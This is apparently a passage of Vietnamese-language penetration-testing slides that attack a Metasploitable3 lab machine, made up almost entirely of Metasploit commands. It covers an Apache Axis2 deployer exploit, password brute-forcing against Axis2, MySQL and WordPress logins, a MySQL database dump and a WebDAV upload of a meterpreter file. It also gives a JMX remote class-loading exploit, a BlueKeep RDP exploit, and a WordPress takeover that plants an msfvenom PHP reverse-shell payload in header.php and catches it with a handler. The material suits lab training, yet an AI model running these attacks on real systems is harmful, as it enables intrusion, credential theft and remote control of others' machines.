  • 23. Apache Axis2 1. Apache axis2 exploit Ứng dụng Web Apache Axis2 có ba phần chính: 'Dịch vụ' liệt kê tất cả các dịch vụ có sẵn được triển khai trong máy chủ này, 'Xác thực' kiểm tra hệ thống để xem liệu tất cả các thư viện cần thiết có sẵn sàng hay không và xem thông tin hệ thống, và 'Quản trị' là mô-đun Quản trị Web Axis2 là bảng điều khiển để quản lý cài đặt Apache Axis2. Mô-đun Quản trị Web Axis2 cung cấp cách cấu hình Axis2 một cách linh hoạt. - use exploit/multi/http/axis2_deployer - set rhosts 192.168.228.132 - set rport 8282 - run 2. Apache axis2 login - msfconsole - use auxiliary/scanner/http/axis_login - set user_file /home/kali/ATHDH/metasploitable3/user - set pass_file /home/kali/ATHDH/metasploitable3/pass
  • 24. - set stop_on_success true - set rhosts 192.168.228.132 - set rport 8282 - run
  • 25. WebDAV - 8585 Mô-đun này có thể lạm dụng các máy chủ web bị định cấu hình sai để tải lên và xóa nội dung web thông qua các yêu cầu HTTP PUT và DELETE. - use auxiliary/scanner/http/http_put - set rhosts 192.168.228.132 - set rport 8585 - set filename meterpreter.php - set path /uploads - run https://github.com/rapid7/metasploit-framework/blob/master/ documentation/modules/exploit/multi/http/axis2_deployer.md
  • 26. SNMP - 161 Giao thức quản lý mạng đơn giản là giao thức Internet tiêu chuẩn để thu thập và tổ chức thông tin về các thiết bị được quản lý trên mạng IP và để sửa đổi thông tin đó nhằm thay đổi hành vi của thiết bị. - use auxiliary/scanner/snmp/snmp_enum - set rhosts 192.168.228.132 - run
  • 27. MySQL Tấn công mật khẩu - use auxiliary/scanner/mysql/mysql_login - set RHOSTS 192.168.157.132 - set userpass_file /home/kali/Documents/user_pass - set verbose yes - run
  • 28. Liệt kê tất cả các tài khoản MySQL trên hệ thống và các đặc quyền khác nhau của chúng. - use auxiliary/admin/mysql/mysql_enum - set RHOSTS 192.168.157.132 - set username root - set password ‘’ - run Truy xuất toàn bộ nội dung của cơ sở dữ liệu:
  • 29. - auxiliary/scanner/mysql/mysql_schemadump - set RHOSTS 192.168.157.132 - set username root - set password ‘’ - run
  • 30. JMX-1617 Mô-đun này tận dụng cấu hình không an toàn của giao diện Java JMX, cho phép tải các lớp từ bất kỳ URL (HTTP) từ xa nào. Các giao diện JMX bị vô hiệu hóa xác thực (com.sun.management.jmxremote.authenticate=false) sẽ dễ bị tấn công, trong khi các giao diện được bật xác thực sẽ chỉ dễ bị tấn công nếu cấu hình yếu được triển khai (cho phép sử dụng javax.management.loading.MLet, có trình quản lý bảo mật cho phép tải ClassLoader MBean, v.v.) - use multi/misc/java_jmx_server - set rhosts 192.168.228.132 - set rport 1617 - run
  • 31. Wordpress - 8585 Khai thác tài khoản mật khẩu trong trong login wordpress. - use auxiliary/scanner/http/wordpress_xmlrpc_login - set RHOSTS 192.168.157.132 - set RPORT 8585 - set targeturi /wordpress - set userpass_file /home/kali/Documents/user_pass - set blank_passwords true - set verbose false - run
  • 32. Liệt kê những người dùng hiện có và sau đó nó sẽ kiểm tra thông tin xác thực hợp lệ: - use auxiliary/scanner/http/wordpress_login_enum - set RHOSTS 192.168.157.132 - set RPORT 8585 - set userpass_file /home/kali/Documents/user_pass - set targeturi /wordpress - run Exploit chiếm quyền điều khiển: -B1: Dùng user, pass đã lấy được để đăng nhập vào wordpress và vào Appearance > Editor chọn header.php
  • 33. -B2: dùng lệnh sau để tạo phần code thêm cho header.php trong đó gán lhost và lport là ip máy tấn công và port tấn công
  • 34. - msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.157.132 lport=5555 -f raw > meterp.php -B3: copy nội dung file đã tạo paste vào header.php rồi ấn upload -B4: Setup tool để truy cập shell
  • 35. - use exploit/multi/handler - set LHOST 192.168.157.128 - set LPORT 5555 - set payload php/meterpreter/reverse_tcp - run -B5: vào lại :8585/wordpress để tool có thể gửi ngược để truy cập shell Tấn công upload form: - use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload - set rhosts 192.168.228.132 - set rport 8585 - set targeturi /wordpress/ - set form_path /index.php/king-of-hearts/ - run
  • 37. Remote Desktop Remote bằng shell: Dùng DoS đánh sập cổng remote desktop: - use auxiliary/scanner/rdp/ms12_020_check - set RHOSTS 192.168.157.132 - run
  • 38. Dịch vụ này cũng dễ bị tấn công Bluekeep và bạn có thể sử dụng mô- đun Metasploit thích hợp để kiểm tra sự tồn tại của lỗ hổng này trong máy mục tiêu. - use exploit/windows/rdp/cve_2019_0708_bluekeep_rce - set RHOSTS 192.168.157.132 - set target 2 - run
  • 40. Ruby on Rails Không vào đc port 3000